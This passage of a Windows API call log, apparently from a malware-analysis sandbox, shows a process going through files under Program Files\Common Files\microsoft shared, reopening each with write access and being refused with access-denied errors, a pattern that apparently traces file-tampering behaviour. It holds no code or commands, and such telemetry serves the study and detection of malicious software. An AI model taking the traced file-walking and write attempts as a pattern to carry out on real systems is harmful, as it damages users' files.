dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0101.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0101.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0101.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.098] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0101.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0101.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0101.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0101.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0101.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0101.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0101.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0101.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0101.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0101.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0101.099] AreFileApisANSI () returned 1 [0101.099] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui", lpUsedDefaultChar=0x0) returned 77 [0101.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0101.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0101.099] AreFileApisANSI () returned 1 [0101.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0101.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cb90 [0101.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8cb90, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 77 [0101.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0101.100] GetFileType (hFile=0x27c) returned 0x1 [0101.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0101.100] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0101.100] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0101.100] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0101.101] CloseHandle (hObject=0x27c) returned 1 [0101.101] AreFileApisANSI () returned 1 [0101.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0101.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d370 [0101.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8d370, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 77 [0101.101] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0101.101] GetLastError () returned 0x5 [0101.101] GetLastError () returned 0x5 [0101.101] SetLastError (dwErrCode=0x5) [0101.101] GetLastError () returned 0x5 [0101.101] SetLastError (dwErrCode=0x5) [0101.101] GetLastError () returned 0x5 [0101.101] SetLastError (dwErrCode=0x5) [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0101.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.102] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.102] FindNextFileW (in: hFindFile=0x77f90, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x98, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5f2d0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x98, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧砀")) returned 0 [0101.102] FindClose (in: hFindFile=0x77f90 | out: hFindFile=0x77f90) returned 1 [0101.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0101.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0101.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0101.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0101.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0101.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0101.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0101.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0101.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0101.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0101.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0101.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.103] AreFileApisANSI () returned 1 [0101.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe", lpUsedDefaultChar=0x0) returned 67 [0101.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0101.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0101.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0101.103] AreFileApisANSI () returned 1 [0101.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0101.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x81fc8 [0101.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x81fc8, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe") returned 67 [0101.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0101.104] GetFileType (hFile=0x368) returned 0x1 [0101.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81fc8 | out: hHeap=0x20000) returned 1 [0101.104] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0101.104] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0101.104] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0101.104] CloseHandle (hObject=0x368) returned 1 [0101.104] AreFileApisANSI () returned 1 [0101.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0101.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82208 [0101.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe") returned 67 [0101.105] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0101.105] GetLastError () returned 0x5 [0101.105] GetLastError () returned 0x5 [0101.105] SetLastError (dwErrCode=0x5) [0101.105] GetLastError () returned 0x5 [0101.105] SetLastError (dwErrCode=0x5) [0101.105] GetLastError () returned 0x5 [0101.105] SetLastError (dwErrCode=0x5) [0101.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0101.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0101.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0101.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.105] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.105] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x84, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8aa90, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x84, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ꘀ\x05⺊Ā")) returned 0 [0101.105] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0101.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0101.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0101.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0101.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0101.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0101.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0101.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0101.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0101.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a5c8 [0101.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0101.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0101.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0101.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0101.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.106] AreFileApisANSI () returned 1 [0101.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16", lpUsedDefaultChar=0x0) returned 56 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0101.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.106] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.106] AreFileApisANSI () returned 1 [0101.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0101.106] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0101.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16") returned 56 [0101.107] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16" (normalized: "c:\\program files\\common files\\microsoft shared\\office16"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0101.107] GetLastError () returned 0x5 [0101.107] GetLastError () returned 0x5 [0101.107] SetLastError (dwErrCode=0x5) [0101.107] GetLastError () returned 0x5 [0101.107] SetLastError (dwErrCode=0x5) [0101.107] GetLastError () returned 0x5 [0101.107] SetLastError (dwErrCode=0x5) [0101.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0101.107] AreFileApisANSI () returned 1 [0101.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0101.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0101.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16") returned 56 [0101.107] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16" (normalized: "c:\\program files\\common files\\microsoft shared\\office16"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0101.107] GetLastError () returned 0x5 [0101.107] GetLastError () returned 0x5 [0101.107] SetLastError (dwErrCode=0x5) [0101.107] GetLastError () returned 0x5 [0101.107] SetLastError (dwErrCode=0x5) [0101.107] GetLastError () returned 0x5 [0101.107] SetLastError (dwErrCode=0x5) [0101.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0101.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0101.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0101.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0101.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0101.108] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, 